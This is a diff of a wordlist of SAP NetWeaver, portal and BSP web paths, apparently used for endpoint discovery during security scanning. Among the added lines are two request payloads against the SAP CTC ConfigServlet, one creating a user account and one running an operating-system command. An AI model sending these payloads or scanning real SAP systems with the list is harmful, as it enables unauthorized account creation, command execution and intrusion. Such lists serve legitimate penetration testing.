 /sap/bc/webdynpro/sap/esh_adm_smoketest_ui
+/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_eng_modelling
 /sap/bc/webdynpro/sap/esh_search_results.ui
 /sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
@@ -314,25 +336,20 @@
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
 /sap/bc/webdynpro/sap/hrrcf_a_tp_assess
-/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
 /sap/bc/webdynpro/sap/sh_adm_smoketest_files
 /sap/bc/webdynpro/sap/wd_analyze_config_appl
 /sap/bc/webdynpro/sap/wd_analyze_config_comp
 /sap/bc/webdynpro/sap/wd_analyze_config_user
 /sap/bc/webdynpro/sap/wdhc_application
-/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
-/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
 /sap/bc/webdynpro/sap/wdr_test_popups_rt
-/sap/bc/webdynpro/sap/WDR_TEST_TABLE
 /sap/bc/webdynpro/sap/wdr_test_ui_elements
-/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
 /sap/bc/webrfc
 /sap/bc/workflow/shortcut
 /sap/bc/xrfc
 /sap/bc/xrfc_test
-/sap/BSSP_SP_MAPS
 /sap/crm
 /sap/es/atk
 /sap/es/cockpit
@@ -347,16 +364,39 @@
 /sap/gw
 /sap/gw/bep
 /sap/gw/jsonrpc
-/SAPIKS
-/SAPIKS2
-/SAPIKS2/contentShow.sap
-/SAPIKS2/jsp/adminShow.jsp
-/SAPIrExtHelp
-/sap/IStest
-/sapmc/sapmc.html
 /sap/monitoring/
 /sap/public
+/sap/public/BusinessSuite
+/sap/public/BusinessSuite/BCV
+/sap/public/BusinessSuite/BSSP
+/sap/public/BusinessSuite/CBESH_ICONS
+/sap/public/BusinessSuite/CloCo
+/sap/public/BusinessSuite/TM
+/sap/public/BusinessSuite/TM/FlashIslands
+/sap/public/BusinessSuite/TM/Icons
+/sap/public/BusinessSuite/TM/Icons_rtl
+/sap/public/E2EALERT
+/sap/public/ES
+/sap/public/HRPDV
+/sap/public/HRPDV/Icons
+/sap/public/HRRenewal
+/sap/public/HRRenewal/PB
+/sap/public/LSOFE
+/sap/public/LSOFE/IconLarge
+/sap/public/LSOFE/IconLarge/CORBU
+/sap/public/LSOFE/IconLarge/TRADESHOW
+/sap/public/LSOFE/Pictogram
+/sap/public/LSOFE/Pictogram/CORBU
+/sap/public/LSOFE/Pictogram/TRADESHOW
+/sap/public/PPM
+/sap/public/PPM/PFM
+/sap/public/PPM/PFM/BCV
+/sap/public/PPM/PFM/UI
+/sap/public/PPM/PRO
 /sap/public/bc
+/sap/public/bc/AR_NEWS_REDRCT
+/sap/public/bc/NWDEMO_MODEL
+/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/abap
 /sap/public/bc/abap/docu
 /sap/public/bc/abap/mime_demo
@@ -364,7 +404,6 @@
 /sap/public/bc/apc_test
 /sap/public/bc/apc_test/apc_tcp_test_sf
 /sap/public/bc/apc_test/apc_tcp_test_sl
-/sap/public/bc/AR_NEWS_REDRCT
 /sap/public/bc/bpo
 /sap/public/bc/bsp
 /sap/public/bc/clms
@@ -388,8 +427,6 @@
 /sap/public/bc/its/mobile/test
 /sap/public/bc/its/scripts
 /sap/public/bc/jsm
-/sap/public/bc/NWDEMO_MODEL
-/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/pictograms
 /sap/public/bc/qgm
 /sap/public/bc/sec
@@ -410,13 +447,13 @@
 /sap/public/bc/ur
 /sap/public/bc/wdtracetool
 /sap/public/bc/webdynpro
-/sap/public/bc/webdynpro/adobechallenge
-/sap/public/bc/webdynpro/adobeChallenge
-/sap/public/bc/webdynpro/mimes
 /sap/public/bc/webdynpro/Polling
+/sap/public/bc/webdynpro/ViewDesigner
+/sap/public/bc/webdynpro/adobeChallenge
+/sap/public/bc/webdynpro/adobechallenge
+/sap/public/bc/webdynpro/mimes
 /sap/public/bc/webdynpro/ssr
 /sap/public/bc/webdynpro/viewdesigner
-/sap/public/bc/webdynpro/ViewDesigner
 /sap/public/bc/webicons
 /sap/public/bc/workflow
 /sap/public/bc/workflow/shortcut
@@ -424,31 +461,16 @@
 /sap/public/bsp/sap
 /sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/public
+/sap/public/bsp/sap/public/FAA
+/sap/public/bsp/sap/public/ISE
+/sap/public/bsp/sap/public/SEM
 /sap/public/bsp/sap/public/bc
 /sap/public/bsp/sap/public/faa
-/sap/public/bsp/sap/public/FAA
 /sap/public/bsp/sap/public/graphics
 /sap/public/bsp/sap/public/graphics/jnet_handler
 /sap/public/bsp/sap/public/graphics/mimes
-/sap/public/bsp/sap/public/ISE
-/sap/public/bsp/sap/public/SEM
 /sap/public/bsp/sap/system
 /sap/public/bsp/sap/system_public
-/sap/public/BusinessSuite
-/sap/public/BusinessSuite/BCV
-/sap/public/BusinessSuite/BSSP
-/sap/public/BusinessSuite/CBESH_ICONS
-/sap/public/BusinessSuite/CloCo
-/sap/public/BusinessSuite/TM
-/sap/public/BusinessSuite/TM/FlashIslands
-/sap/public/BusinessSuite/TM/Icons
-/sap/public/BusinessSuite/TM/Icons_rtl
-/sap/public/E2EALERT
-/sap/public/ES
-/sap/public/HRPDV
-/sap/public/HRPDV/Icons
-/sap/public/HRRenewal
-/sap/public/HRRenewal/PB
 /sap/public/icf_check
 /sap/public/icf_info
 /sap/public/icf_info/icr_groups
@@ -457,23 +479,14 @@
 /sap/public/icf_info/urlprefix
 /sap/public/icman
 /sap/public/icman/ping
+/sap/public/icmandir/its/kernel_version.info
+/sap/public/icmandir/last_update_ITS.txt
+/sap/public/icmandir/last_update_icmadmin.txt
 /sap/public/info
-/sap/public/LSOFE
-/sap/public/LSOFE/IconLarge
-/sap/public/LSOFE/IconLarge/CORBU
-/sap/public/LSOFE/IconLarge/TRADESHOW
-/sap/public/LSOFE/Pictogram
-/sap/public/LSOFE/Pictogram/CORBU
-/sap/public/LSOFE/Pictogram/TRADESHOW
 /sap/public/myssocntl
 /sap/public/opu
 /sap/public/opu/resources
 /sap/public/ping
-/sap/public/PPM
-/sap/public/PPM/PFM
-/sap/public/PPM/PFM/BCV
-/sap/public/PPM/PFM/UI
-/sap/public/PPM/PRO
 /sap/wdisp/admin
 /sap/wdvd
 /sap/webcuif
@@ -485,26 +498,20 @@
 /sap/webdynpro/sap/hrtmc_ta_assessment
 /sap/webdynpro/sap/hrtmc_ta_dashboard
 /sap/webdynpro/sap/wd_analyze_config_user
+/sapmc/sapmc.html
 /scripts/wgate
 /servlet/com.sap.admin.Critical.Actio
 /sim/
 /sim/config/testdata.jsp
 /sim/config/testerror.jsp
 /sim/index.html
-/SLDStart/plain
-/SLDStart/secure
 /socoview
 /socoview/flddisplay.asp
-/SQLtrace/index.html
 /sysconfig
-/tc/lm/webadmin/clusteradmin
 /tc.lm.webadmin.endtoend.public.app
+/tc/lm/webadmin/clusteradmin
 /teched/test
-/TestJDBC_Web
-/TOdbo
 /top.html
-/TSapq
-/TXmla
 /uddi/
 /uddiclient
 /uddiclient/jsps/index.jsp
@@ -512,7 +519,6 @@
 /useradmin
 /userhome
 /utl/UsageTypesInfo
-/VC
 /vscantest/
 /webdynpro/dispatcher
 /webdynpro/dispatcher/
@@ -530,14 +536,11 @@
 /webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
 /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
 /webdynpro/dispatcher/sap.com/tc~wd~tools
-/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
 /webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
+/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
 /webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
 /webdynpro/resources/sap.com/
 /webdynpro/welcome/Welcome.jsp
-/WSConnector/Config1
-/WSConnector/Config1?wsdl
-/WSConnector/Config?wsdl
 /wsd2wsdl
 /wsnavigator
 /wsnavigator/jsps/index.jsp
@@ -547,3 +550,1084 @@
 /wssproc/cert
 /wssproc/plain
 /wssproc/ssl
+@download@
+ADS-EJB
+ADS-License
+AE/index.jsp
+Adobe
+AdobeDocumentServices/Config
+AdobeDocumentServices/Config?wsdl
+AdobeDocumentServices/Grmg
+AdobeDocumentServicesSec/Config
+ApplicationAdminProvider
+BI_UDC
+BizcCommLayerAuthoring/Config1
+BizcCommLayerAuthoring/Config1?wsdl
+BizcCommLayerUtilities/Config1
+CAFDataService/Config
+CAFDataService/Config?wsdl
+CMSRTS/Config1
+CMSRTS/Config1?wsdl
+DataArchivingService
+GRMGHeartBeat
+GRMGWSTest/service
+GRMGWSTest/service?wsdl
+IGSCustomizingXML
+IciActionItemService/IciActionItemConf
+IciActionItemService/IciActionItemConf?wsdl
+IciChatLineService/IciChatLineConf
+IciChatLineService/IciChatLineConf?wsdl
+IciChatSessionService/IciChatSessionConf
+IciContainerService/IciContainerConf
+IciEventService/
+IciEventService/IciEventConf
+IciEventService/IciEventConf?wsdl
+IciEventService/sap
+IciFolderService/IciFolderConf
+IciFolderService/IciFolderConf?wsdl
+IciItemService/IciItemConf
+IciItemService/IciItemConf?wsdl
+IciMessageService/IciMessageConf
+IciMessageService/IciMessageConf?wsdl
+IciMonitorService/IciMonitorConf
+IciMonitorService/IciMonitorConf?wsdl
+IciPhoneCallService/IciPhoneCallConf
+IciPhoneCallService/IciPhoneCallConf?wsdl
+IciPhoneLineService/IciPhoneLineConf
+IciSystemService/IciSystemConf
+IciSystemService/IciSystemConf?wsdl
+IciUserService/IciUserConf
+IciUserService/IciUserConf?wsdl
+KW
+Lighthammer
+Modeler
+OpenSQLMonitors
+OpenSQLMonitors/
+OpenSQLMonitors/index.html
+PerformacetraceTraceApplication
+RE/index.jsp
+SAPIKS
+SAPIKS2
+SAPIKS2/contentShow.sap
+SAPIKS2/jsp/adminShow.jsp
+SAPIrExtHelp
+SLDStart/plain
+SLDStart/secure
+SQLTrace
+SQLtrace/index.html
+TOdbo
+TSapq
+TXmla
+TestJDBC_Web
+VC
+WSConnector/Config1
+WSConnector/Config1?wsdl
+WSConnector/Config2
+_default
+apidocs/
+apidocs/allclasses-frame.html
+apidocs/com/sap/engine/connector/connection/IConnection.html
+apidocs/com/sap/engine/deploy/manager/Deploymanager.html
+apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+apidocs/com/sap/engine/deploy/manager/LoginInfo.html
+bcb
+bcb/
+bcb/bcbadmHome.jsp
+bcb/bcbadmNavigation.jsp
+bcb/bcbadmSettings.jsp
+bcb/bcbadmStart.jsp
+bcb/bcbadmSystemInfo.jsp
+bcbtest
+bcbtest/start.jsp
+bwtest
+caf
+ccsui
+com~tc~lm~webadmin~httpprovider~web
+ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
+dispatcher
+dswsbobje
+dtr_lite
+ecatt
+entrypoints/recent
+examples
+examples.html
+examples/
+examples_frame.html
+exchangeProfile
+exchangeProfile/
+guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
+htmlb
+htmlb/
+htmlb/index.html
+index.html
+inspection.wsil
+ipcpricing/ui/
+irj
+irj/go/km/basicsearch
+irj/go/km/details
+irj/go/km/docs
+irj/go/km/docs/etc/public/mimes/images
+irj/go/km/docs/etc/xmlforms
+irj/go/km/docs/ume/users
+irj/go/km/highlightedcontent
+irj/go/km/navigation
+irj/go/km/navigation/
+irj/go/km/navigation/ume/users
+irj/portal
+irj/portalapps
+irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
+irj/portalapps/com.sap.portal.design.portaldesigndata
+irj/portalapps/com.sap.portal.design.urdesigndata
+irj/portalapps/com.sap.portal.epcf.loader
+irj/portalapps/com.sap.portal.navigation.detailedtree
+irj/sdn/soa-discovery
+irj/servlet
+irj/servlet/prt
+irj/servlet/prt/portal
+irj/servlet/prt/portal/
+irj/servlet/prt/portal/prtroot
+irj/servlet/prt/portal/prtroot/PortalAnywhere.Go
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.basicsearch
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.docs -> webdav
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.highlightedcontent
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.navigation
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.uidetails
+irj/servlet/prt/portal/prtroot/com.sap.km.home_ws
+irj/servlet/prt/portal/prtroot/com.sap.netweaver.kmc.people.PeopleDetails?Uri=/ume/users/USER.PRIVATE_DATASOURCE.un%253AAdministrator.usr
+irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
+irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
+irj/servlet/prt/portal/prtroot/pcd!(*)
+irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
+lcrabapapi
+logon
+logon/index.jsp
+logon/logonServlet
+logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
+logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
+main.html
+mbeanreg
+meSync
+meSync/HttpGRMGTest.html
+mmr
+mmr/
+modeller/
+modeller/index.html
+monitoring
+monitoringProvierRoot
+nwa
+performanceProvierRoot
+pmi
+portal
+portalapps
+rep/build_info.html
+rep/build_info.jsp
+rep/start/index.jsp
+run/build_info.html
+run/build_info.jsp
+rwb/version.html
+saml
+samlssodemo_dest
+samlssodemo_source
+sap
+sap/
+sap/IStest
+sap/admin
+sap/admin/default.html
+sap/admin/index.html
+sap/ap
+sap/bc
+sap/bc/
+sap/bc/BEx
+sap/bc/FormToRfc
+sap/bc/FormToRfc/soap
+sap/bc/IDoc_XML
+sap/bc/MIDSD
+sap/bc/MJC
+sap/bc/MJC/
+sap/bc/MJC/mi_host
+sap/bc/MJC/mi_mds
+sap/bc/MJC/mi_service
+sap/bc/MJC/mi_services
+sap/bc/MY_NEW_SERV99
+sap/bc/Mi_host_http
+sap/bc/Mime
+sap/bc/bsp
+sap/bc/bsp/
+sap/bc/bsp/esh_os_service/favicon.gif
+sap/bc/bsp/sap
+sap/bc/bsp/sap/
+sap/bc/bsp/sap/SXSLT_DEMO
+sap/bc/bsp/sap/absenceform_new
+sap/bc/bsp/sap/alertinbox
+sap/bc/bsp/sap/alertinboxwap
+sap/bc/bsp/sap/bexlogon
+sap/bc/bsp/sap/bkbtest
+sap/bc/bsp/sap/bkbtest_sch
+sap/bc/bsp/sap/brf_export_xml
+sap/bc/bsp/sap/brf_info
+sap/bc/bsp/sap/bsp_dlc_frcmp
+sap/bc/bsp/sap/bsp_model
+sap/bc/bsp/sap/bsp_veri
+sap/bc/bsp/sap/bsp_verificatio
+sap/bc/bsp/sap/bsp_vhelp
+sap/bc/bsp/sap/bsp_wd_base
+sap/bc/bsp/sap/bsp_wd_comp_spl
+sap/bc/bsp/sap/bsp_wd_compbase
+sap/bc/bsp/sap/bsp_wd_ddlb_spl
+sap/bc/bsp/sap/bsp_wd_tree_spl
+sap/bc/bsp/sap/bspwd_basics
+sap/bc/bsp/sap/bspwd_cmp_embed
+sap/bc/bsp/sap/bspwd_simple
+sap/bc/bsp/sap/btf_ext_demo
+sap/bc/bsp/sap/ccms_mc
+sap/bc/bsp/sap/certmap
+sap/bc/bsp/sap/certreq
+sap/bc/bsp/sap/crm_bm
+sap/bc/bsp/sap/crm_bsp_bab_dis
+sap/bc/bsp/sap/crm_bsp_bab_dss
+sap/bc/bsp/sap/crm_bsp_bab_exi
+sap/bc/bsp/sap/crm_bsp_bab_fra
+sap/bc/bsp/sap/crm_bsp_bab_pan
+sap/bc/bsp/sap/crm_bsp_f1_help
+sap/bc/bsp/sap/crm_bsp_f4_help
+sap/bc/bsp/sap/crm_bsp_face
+sap/bc/bsp/sap/crm_bsp_frame
+sap/bc/bsp/sap/crm_bsp_listper
+sap/bc/bsp/sap/crm_bsp_lst_prt
+sap/bc/bsp/sap/crm_bsp_xbab_fr
+sap/bc/bsp/sap/crm_bsp_xbab_pa
+sap/bc/bsp/sap/crm_ei_cmp_admn
+sap/bc/bsp/sap/crm_ic_check
+sap/bc/bsp/sap/crm_ic_ise
+sap/bc/bsp/sap/crm_ic_ise/editor
+sap/bc/bsp/sap/crm_ic_mcm
+sap/bc/bsp/sap/crm_ic_preview
+sap/bc/bsp/sap/crm_ic_xmledit
+sap/bc/bsp/sap/crm_ici_tst_cat
+sap/bc/bsp/sap/crm_ml_preview
+sap/bc/bsp/sap/crm_preview
+sap/bc/bsp/sap/crm_prt_url_dis
+sap/bc/bsp/sap/crm_thtmlb_util
+sap/bc/bsp/sap/crm_ui_frame
+sap/bc/bsp/sap/crm_ui_start
+sap/bc/bsp/sap/crm_xml_test
+sap/bc/bsp/sap/crmcmp_bpident/
+sap/bc/bsp/sap/crmcmp_brfcase
+sap/bc/bsp/sap/crmcmp_hdr
+sap/bc/bsp/sap/crmcmp_hdr_std
+sap/bc/bsp/sap/crmcmp_ic_frame
+sap/bc/bsp/sap/decode_url
+sap/bc/bsp/sap/ecteched
+sap/bc/bsp/sap/esh_sap_link
+sap/bc/bsp/sap/esh_sapgui_exe
+sap/bc/bsp/sap/frontend_print
+sap/bc/bsp/sap/graph_bsp_test
+sap/bc/bsp/sap/graph_bsp_test/Mimes
+sap/bc/bsp/sap/graph_tut_chart
+sap/bc/bsp/sap/graph_tut_chart/Mimes
+sap/bc/bsp/sap/graph_tut_jnet
+sap/bc/bsp/sap/graph_tut_jnet/Mimes
+sap/bc/bsp/sap/graph_tutorials
+sap/bc/bsp/sap/graph_tutorials/mimes
+sap/bc/bsp/sap/gsbirp
+sap/bc/bsp/sap/hap_document
+sap/bc/bsp/sap/hap_q_profile
+sap/bc/bsp/sap/hr_expert
+sap/bc/bsp/sap/htmlb_samples
+sap/bc/bsp/sap/ic_base
+sap/bc/bsp/sap/ic_frw_notify
+sap/bc/bsp/sap/iccmp_bp_cnfirm
+sap/bc/bsp/sap/iccmp_hdr_cntnr
+sap/bc/bsp/sap/iccmp_hdr_cntnt
+sap/bc/bsp/sap/iccmp_header
+sap/bc/bsp/sap/iccmp_ssc_ll/
+sap/bc/bsp/sap/icf
+sap/bc/bsp/sap/icf_notify_poll
+sap/bc/bsp/sap/icfrecorder
+sap/bc/bsp/sap/icm
+sap/bc/bsp/sap/it00
+sap/bc/bsp/sap/it01
+sap/bc/bsp/sap/it02
+sap/bc/bsp/sap/it03
+sap/bc/bsp/sap/it04
+sap/bc/bsp/sap/it05
+sap/bc/bsp/sap/itsm
+sap/bc/bsp/sap/me_fw_install
+sap/bc/bsp/sap/merep_app_meta
+sap/bc/bsp/sap/ppm
+sap/bc/bsp/sap/ppm_detail
+sap/bc/bsp/sap/public
+sap/bc/bsp/sap/public/
+sap/bc/bsp/sap/public/FormGraphics
+sap/bc/bsp/sap/public/bc
+sap/bc/bsp/sap/public/graphics
+sap/bc/bsp/sap/rmpspb_case
+sap/bc/bsp/sap/rmpspb_casenote
+sap/bc/bsp/sap/rsrthemes_iview
+sap/bc/bsp/sap/sam_demo
+sap/bc/bsp/sap/sam_notifying
+sap/bc/bsp/sap/sam_sess_queue
+sap/bc/bsp/sap/sapsign
+sap/bc/bsp/sap/sapterm
+sap/bc/bsp/sap/sbsp_dal_demo
+sap/bc/bsp/sap/sbspext_bsp
+sap/bc/bsp/sap/sbspext_htmlb
+sap/bc/bsp/sap/sbspext_phtmlb
+sap/bc/bsp/sap/sbspext_table
+sap/bc/bsp/sap/sbspext_xhtmlb
+sap/bc/bsp/sap/scpbspconvertuc
+sap/bc/bsp/sap/sem_upwb
+sap/bc/bsp/sap/sf_webform_01
+sap/bc/bsp/sap/sf_webform_02
+sap/bc/bsp/sap/sf_webform_03
+sap/bc/bsp/sap/sf_webform_04
+sap/bc/bsp/sap/sfint_demo01
+sap/bc/bsp/sap/sfint_demo02
+sap/bc/bsp/sap/sfint_demo03
+sap/bc/bsp/sap/sfint_demo04
+sap/bc/bsp/sap/sicf_login_test
+sap/bc/bsp/sap/sicf_login_test/
+sap/bc/bsp/sap/sicf_login_test/test
+sap/bc/bsp/sap/sicf_login_test/testNoRedirect
+sap/bc/bsp/sap/smart_forms
+sap/bc/bsp/sap/spi_admin
+sap/bc/bsp/sap/spi_monitor
+sap/bc/bsp/sap/spi_procmonitor
+sap/bc/bsp/sap/srm_demo_bspext
+sap/bc/bsp/sap/srm_demo_note
+sap/bc/bsp/sap/srm_demo_record
+sap/bc/bsp/sap/srm_doc_test
+sap/bc/bsp/sap/srm_gensp_query
+sap/bc/bsp/sap/srm_note
+sap/bc/bsp/sap/srm_prop
+sap/bc/bsp/sap/srm_record
+sap/bc/bsp/sap/srmclfrm
+sap/bc/bsp/sap/srmps_browser
+sap/bc/bsp/sap/srmps_favorites
+sap/bc/bsp/sap/srmps_history
+sap/bc/bsp/sap/srmps_metadata
+sap/bc/bsp/sap/srmps_search
+sap/bc/bsp/sap/srt_browser
+sap/bc/bsp/sap/ssf_techinf
+sap/bc/bsp/sap/ssfdemodigsig
+sap/bc/bsp/sap/ssfdemodigsig2
+sap/bc/bsp/sap/swfmod_portal
+sap/bc/bsp/sap/swh_demo_calc
+sap/bc/bsp/sap/swn_config
+sap/bc/bsp/sap/swn_message1
+sap/bc/bsp/sap/swn_wiexecute
+sap/bc/bsp/sap/swxtraagent
+sap/bc/bsp/sap/swxtrareq
+sap/bc/bsp/sap/sxidemo_agcy_ui
+sap/bc/bsp/sap/sxms_alertrules
+sap/bc/bsp/sap/sxslt_training
+sap/bc/bsp/sap/system
+sap/bc/bsp/sap/system640
+sap/bc/bsp/sap/system_priv_01
+sap/bc/bsp/sap/system_priv_02
+sap/bc/bsp/sap/system_priv_03
+sap/bc/bsp/sap/system_private
+sap/bc/bsp/sap/system_public
+sap/bc/bsp/sap/system_test
+sap/bc/bsp/sap/t_sam_demo
+sap/bc/bsp/sap/thtmlb_scripts
+sap/bc/bsp/sap/thtmlb_styles
+sap/bc/bsp/sap/tunguska
+sap/bc/bsp/sap/tunguska_detail
+sap/bc/bsp/sap/tutorial_1
+sap/bc/bsp/sap/tutorial_2
+sap/bc/bsp/sap/tutorial_2htmlb
+sap/bc/bsp/sap/tutorial_3
+sap/bc/bsp/sap/tutorial_3_mvc
+sap/bc/bsp/sap/tutorial_4
+sap/bc/bsp/sap/tutorial_4_mvc
+sap/bc/bsp/sap/tutorial_cache
+sap/bc/bsp/sap/uddiclientfind
+sap/bc/bsp/sap/uddiclpublish
+sap/bc/bsp/sap/uicmp_ltx
+sap/bc/bsp/sap/upwb_sem
+sap/bc/bsp/sap/upwb_test_otr
+sap/bc/bsp/sap/upx_exec
+sap/bc/bsp/sap/upx_exec2
+sap/bc/bsp/sap/uws_form_servic
+sap/bc/bsp/sap/wap_push
+sap/bc/bsp/sap/webdynprodemos
+sap/bc/bsp/sap/wp_sess_test2
+sap/bc/bsp/sap/wscb
+sap/bc/bsp/sap/wsi_oci_bsp
+sap/bc/bsp/sap/wsi_oci_bsp_mvc
+sap/bc/bsp/sap/xi_pf_perf_moni
+sap/bc/bsp/sap/xi_pf_test
+sap/bc/bsp/sap/xmb_bsp_log
+sap/bc/bsp/scmb
+sap/bc/bsp/scmb/df_web2
+sap/bc/bsp_dev
+sap/bc/bw_test
+sap/bc/cachetest
+sap/bc/ccms
+sap/bc/ccms/
+sap/bc/ccms//Specto
+sap/bc/ccms/MarketSet
+sap/bc/ccms/monitoring
+sap/bc/ccms/monitoring/GRMG_APP
+sap/bc/ccms/monitoringCCMS_XML
+sap/bc/ce_url
+sap/bc/cimom
+sap/bc/cms
+sap/bc/contentserver
+sap/bc/crm_bsp_dl
+sap/bc/dal
+sap/bc/dal/demoB
+sap/bc/daldemoA
+sap/bc/doc
+sap/bc/doc/
+sap/bc/doc/browser
+sap/bc/doc/mast
+sap/bc/doc/meta
+sap/bc/doc/metadata
+sap/bc/doc/tmpl
+sap/bc/doc/tran
+sap/bc/docu
+sap/bc/dr
+sap/bc/ecatt
+sap/bc/ecatt/
+sap/bc/ecatt/ecatt_recorder
+sap/bc/ecatt/ecattping
+sap/bc/ecatt/log_provider
+sap/bc/echo
+sap/bc/echo/
+sap/bc/echo/logon
+sap/bc/echo/logon_base64
+sap/bc/echo/redirect
+sap/bc/error
+sap/bc/error/
+sap/bc/error/list
+sap/bc/error/template
+sap/bc/error/webgui
+sap/bc/esf
+sap/bc/formabsdelete
+sap/bc/fp
+sap/bc/fpads
+sap/bc/generate
+sap/bc/generate/poll
+sap/bc/graphics
+sap/bc/graphics/net
+sap/bc/gui
+sap/bc/gui/its
+sap/bc/gui/sap
+sap/bc/gui/sap/its/
+sap/bc/gui/sap/its/BWSP
+sap/bc/gui/sap/its/BWWF_WI_DECI
+sap/bc/gui/sap/its/BWWI_EXECUTE
+sap/bc/gui/sap/its/CCMS_APPSRVLIS
+sap/bc/gui/sap/its/CCMS_DBBUFARCH
+sap/bc/gui/sap/its/CERTMAP
+sap/bc/gui/sap/its/CERTREQ
+sap/bc/gui/sap/its/CRM_CIC_RABOX
+sap/bc/gui/sap/its/GRM_WRAPPER
+sap/bc/gui/sap/its/MININOTES
+sap/bc/gui/sap/its/MY_PROFILEMATC
+sap/bc/gui/sap/its/RSAU_STATUS
+sap/bc/gui/sap/its/SAPSIGN
+sap/bc/gui/sap/its/SAP_GENERATE
+sap/bc/gui/sap/its/SSFIDEMODIGSIG
+sap/bc/gui/sap/its/STATUSPANEL
+sap/bc/gui/sap/its/STERM_ITS
+sap/bc/gui/sap/its/TEST_XMLPARSER
+sap/bc/gui/sap/its/WSI_OCI_ITS
+sap/bc/gui/sap/its/XML_DTD_01
+sap/bc/gui/sap/its/alinkviewer
+sap/bc/gui/sap/its/bwca
+sap/bc/gui/sap/its/designs
+sap/bc/gui/sap/its/my_qualis
+sap/bc/gui/sap/its/my_requirement
+sap/bc/gui/sap/its/sample
+sap/bc/gui/sap/its/sample/
+sap/bc/gui/sap/its/sample/IAC_CALENDAR
+sap/bc/gui/sap/its/sample/IAC_FLIGHT
+sap/bc/gui/sap/its/sample/IAC_INPUT
+sap/bc/gui/sap/its/sample/IAC_SE38
+sap/bc/gui/sap/its/sample/IAC_TABLE
+sap/bc/gui/sap/its/sample/IAC_TEXTEDIT
+sap/bc/gui/sap/its/sample/IAC_TOOLBAR
+sap/bc/gui/sap/its/sample/IAC_TREE1
+sap/bc/gui/sap/its/sample/IAC_TREE2
+sap/bc/gui/sap/its/sample/iAC_HTML
+sap/bc/gui/sap/its/test
+sap/bc/gui/sap/its/test/
+sap/bc/gui/sap/its/test/it
+sap/bc/gui/sap/its/test/it/
+sap/bc/gui/sap/its/test/it/IT12
+sap/bc/gui/sap/its/test/it/IT13
+sap/bc/gui/sap/its/test/it/ITRBX
+sap/bc/gui/sap/its/test/it/it00
+sap/bc/gui/sap/its/test/it/it19
+sap/bc/gui/sap/its/test/webgui_end
+sap/bc/gui/sap/its/test/webgui_tj
+sap/bc/gui/sap/its/test/webgui_txend
+sap/bc/gui/sap/its/webgui
+sap/bc/gui/sap/its/webgui/!
+sap/bc/icf
+sap/bc/icf/
+sap/bc/icf/demo
+sap/bc/icf/demo/example_1
+sap/bc/icf/recorder
+sap/bc/icf/verification
+sap/bc/icman
+sap/bc/icman/test01
+sap/bc/idoc_xml
+sap/bc/igs_data
+sap/bc/kw
+sap/bc/kw/
+sap/bc/kw/K/Link
+sap/bc/kw/fs
+sap/bc/kw/mime
+sap/bc/kw/skwr
+sap/bc/mlt
+sap/bc/mlt/
+sap/bc/mlt//vb
+sap/bc/mlt/slim
+sap/bc/mlt/slim/
+sap/bc/mlt/slim//lang_plus
+sap/bc/mlt/slim/branching
+sap/bc/mlt/slim/pcx
+sap/bc/mlt/slim/pcx_plus
+sap/bc/mlt/test
+sap/bc/mlt/tmware
+sap/bc/mlt/trados
+sap/bc/notify
+sap/bc/notify/polling
+sap/bc/ping
+sap/bc/print
+sap/bc/rehm
+sap/bc/report
+sap/bc/sapits_mimes
+sap/bc/smart_forms
+sap/bc/soap
+sap/bc/soap/
+sap/bc/soap/doc
+sap/bc/soap/ici
+sap/bc/soap/ici_ssl
+sap/bc/soap/rfc
+sap/bc/soap/wsdl
+sap/bc/soap/wsdl11
+sap/bc/soap/wsdlservices
+sap/bc/spi_gate
+sap/bc/srm
+sap/bc/srm/rcm_webdav
+sap/bc/srm/rcm_webdav/
+sap/bc/srm/rcm_webdav/s_area_cmg
+sap/bc/srm/rcm_webdav/s_area_rms
+sap/bc/srt
+sap/bc/srt/
+sap/bc/srt/IDoc
+sap/bc/srt/esf
+sap/bc/srt/rfc
+sap/bc/srt/rfc/
+sap/bc/srt/rfc/OSP
+sap/bc/srt/rfc/sap
+sap/bc/srt/sap/
+sap/bc/srt/sap/Detailed_flight_info_get
+sap/bc/srt/sap/ER_REGISTRY_SUPPORT_SERVICE
+sap/bc/srt/sap/II_TEST_IN_SYNC
+sap/bc/srt/sap/ME_RT_DSD_WS_64
+sap/bc/srt/sap/QUERY_VIEW_DATA
+sap/bc/srt/sap/RSDAW_NEARLINE_SERVER
